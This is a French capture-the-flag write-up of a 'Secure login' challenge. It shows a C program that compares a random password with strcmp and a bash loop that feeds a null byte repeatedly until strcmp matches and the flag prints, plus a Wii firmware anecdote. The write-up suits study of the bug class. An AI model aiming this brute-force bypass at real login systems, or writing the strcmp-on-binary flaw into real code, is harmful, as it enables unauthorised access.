# Binary

## Secure login

On nous donne le code suivant :

```c
#include <stdio.h>

char password[128];

void generate_password() {
	FILE *file = fopen("/dev/urandom","r");
	fgets(password, 128, file);
	fclose(file);
}

void main() {
	generate_password();

	char input[128];
	printf("Enter the password: ");
	fgets(input, 128, stdin);

	if (strcmp(input, password) == 0) {
	  // print flag
	} else {
		puts("Wrong!");
	}
}
```
Le mot de passe est généré aléatoirement en prenant 128 caractères depuis `/dev/urandom` et est comparé à l'entrée utilisateur et si les deux correspondent, le flag est affiché.

Il n'est pas nécessaire de chercher à prédire la source d'aléa car la fonction de comparaison utilisée, `strcmp` arrête la comparaison au premier octet nul rencontré rencontré. Rien n'empêchant, les 128 caractères aléatoires de contenir le nul byte, on a une chance non nulle à chaque lancement du programme que le premier octet du mot de passe aléatoire soit l'octet nul.

Il suffit alors de lancer le programme autant de fois que nécessaire en fournissant une chaîne vide en entrée utilisateur. Voici un script qui le fait et qui affiche le flag :

```bash
#!/bin/bash

while true; do
  out=$(python2 -c "print '\0\n'" | ./login)
  #echo $out
  if [[ $out != *"Wrong"* ]]; then
    echo $out
  fi
done
```

Pour [l'anecdote historique](https://youtu.be/0rjaiNIc4W8?t=1780), les premières versions du firmware de la Wii ont été compromises car les développeurs avaient utilisé la fonction `strcmp` pour comparer des hashs SHA-1 de signatures **au format binaire**. Les hackeurs ont donc pu signer des données arbitraires en les manipulant légèrement pour que le SHA-1 commence par le nul byte.
